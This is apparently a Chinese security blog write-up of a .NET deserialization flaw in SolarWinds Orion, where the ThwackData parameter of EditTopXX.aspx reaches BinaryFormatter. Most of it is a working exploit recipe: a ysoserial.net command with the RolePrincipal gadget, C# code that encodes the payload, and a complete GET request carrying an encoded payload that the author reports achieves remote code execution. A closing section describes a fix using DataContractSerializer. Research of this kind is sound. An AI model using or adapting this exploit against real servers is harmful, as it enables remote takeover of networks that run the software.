警告
本文最后更新于 2021-10-23,文中内容可能已过时。
漏洞同样出在 Serializer.Deserialize<T>(string serializedObject)。漏洞代码位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs，它把请求参数 ThwackData 的值（攻击者可控）直接交给 Serializer.Deserialize<T>，而该方法底层同样调用 BinaryFormatter.Deserialize，对 payload 中出现的类型没有任何限制——(T) 强制转换发生在反序列化完成之后，此时 gadget 链早已执行完毕。
ysoserial.net 生成的 payload 可以直接打。需要注意这个入口只能用 GET 请求发包，payload 必须放进 URL 查询串，会受到服务器对 URL/查询串长度的限制，所以要加 --minify 生成尽量小的 payload。
| ysoserial.exe -f binaryformatter -g RolePrincipal --minify -c "ping localhost -t"
然后按目标端 Base64Helper.Base64Decode 的逆序做编码：先把 ysoserial 输出的 Base64 字符串按 UTF-8 取字节，再用 HttpServerUtility.UrlTokenEncode 编码（下面 HomeController.Index() 中传给 UrlTokenEncode 的字符串处应填入 ysoserial 输出的 Base64 字符串）：
| using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Web;
using System.Web.Mvc;
namespace WebApplication1.Controllers
{
public class HomeController : Controller
{
public ActionResult Index()
{
var payload = HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(
"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"));
Response.Write(payload);
return View();
}
}
public class Serializer
{
// Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
public static string Serialize(object parameters)
{
string result;
using (MemoryStream memoryStream = new MemoryStream())
{
new BinaryFormatter().Serialize(memoryStream, parameters);
result = Base64Helper.Base64Encode(memoryStream.ToArray());
}
return result;
}
// Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
public static T Deserialize<T>(string serializedObject)
{
T result;
using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
{
result = (T) ((object) new BinaryFormatter().Deserialize(stream));
}
return result;
}
}
internal class Base64Helper
{
// Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
public static string Base64Encode(byte[] str)
{
return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
}
// Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
public static byte[] Base64Decode(string str)
{
byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
}
}
}
构造请求如下，ThwackData 参数的值就是上一步编码得到的 payload：
| http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=QUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFcFRlWE4wWlcwdVYyVmlMRlpsY25OcGIyNDlOQzR3TGpBdU1DeERkV3gwZFhKbFBXNWxkWFJ5WVd3c1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUVVCQUFBQUlWTjVjM1JsYlM1WFpXSXVVMlZqZFhKcGRIa3VVbTlzWlZCeWFXNWphWEJoYkFFQUFBQXFVM2x6ZEdWdExsTmxZM1Z5YVhSNUxrTnNZV2x0YzFCeWFXNWphWEJoYkM1SlpHVnVkR2wwYVdWekFRSUFBQUFHQXdBQUFOZ0ZRVUZGUVVGQlJDOHZMeTh2UVZGQlFVRkJRVUZCUVVGTlFXZEJRVUZDZEU1aFYwNTVZak5PZGxwdVVYVlZSemt6V2xoS1ZHRkhWbk5pUXpWR1drZHNNR0l6U1VaQlVVRkJRVVZLVG1GWFRubGlNMDUyV201UmRWWnRiSHBrVjBaelZUTlNNVnBIYkhaTWJGSnNaVWhSZFZKdE9YbGlWMFl3WkVkc2RWcDVOVlZhV0dnd1VtMDVlV0pYUmpCa1IyeDFXakZLTVdKc1FubGlNMEpzWTI1U2NGcFlUVUpCUVVGQlJEQmFkbU50Vm01amJUa3hZbTFTUTJOdVZucGhRVVZEUVVGQlFVSm5UVUZCUVVOSVFYcDRVRmx0Y0d4Wk0xSkZXVmhTYUZWSVNuWmtiV3hyV2xoSloxUlhWakJoUnpsclZHMUdkRnBVTUdsVk0xSm9ZMjVSYVVsSWFIUmlSelY2VUZOS2IyUklVbmRQYVRoMll6Sk9iMXBYTVdoamVUVjBZVmRPZVdJelRuWmFibEYxV1RJNWRFd3paSEJpYlZvMFRIcEpkMDFFV1habFIwWjBZa001ZDJOdFZucGFWelV3V1ZoU2NHSXlOR2xKU0doMFlrYzFlazl0UlRsSmJVNXpZMmt4ZFZsWE1XeGpNMEpvV1RKVk5sVXpiSHBrUjFaMFRHdFNjRmxYWkhWaU0wNHdZVmRPZWs4eVJucGpNbFowV1cxNE5WQldUalZqTTFKc1lsTkpLMUJGT1dsaGJWWnFaRVZTYUdSSFJsRmpiVGt5WVZkU2JHTnBOVkJaYlhCc1dUTlNTbUp1VGpCWlZ6VnFXbFEwT0ZsVWNGRmpiVGxxV2xoT2VsQnFlR2hQYkVKNVlqSk9iR016VFhWVk0xSm9ZMjVTU21KdFduWlFhbmhvVDJ4Q2VXSXlUbXhqTTA1VVpFZEdlV1JGYkhWYWJUaG5VVmhLYm1SWE1XeGlibEo2VUZOSmRsbDVRbmRoVnpWdVNVZDRkbGt5Um5OaFJ6bDZaRU5CZEdSRFNXZFNiV3h6V2xVMWFHSlhWVGxKYlU1MFdrTkpkbEJxZDNaWlZIQlJZMjA1YWxwWVRucE1iRTR3V1ZoS01GTlhOVzFpZWpRNFRESkZObFZJU25aWk1sWjZZM28wT0V3d09XbGhiVlpxWkVWU2FHUkhSbEZqYlRreVlWZFNiR05wTlZCWmJYQnNXVE5TU21KdVRqQlpWelZxV2xRME9Fd3dPV2xoYlZacVpFVlNhR1JIUmxGamJUa3lZVmRTYkdOcU5Fd0w1
结果：RCE——服务端反序列化 ThwackData 后执行了 -c 指定的命令。
问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。
修复方式：改用 DataContractSerializer 处理序列化，并通过 KnownTypes（KnownTypeAttribute 或构造函数的 knownTypes 参数）限定可反序列化的类型集合。DataContractSerializer 只会实例化声明的根类型 T 及其已知类型，payload 中的类型名无法再指定任意类型；前提是 T 本身不能是 object 这类过于宽泛的类型。注意：只给 BinaryFormatter 加 SerializationBinder 并不算修复——BinaryFormatter 对不可信输入没有安全的用法（.NET 9 已将其移除）。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。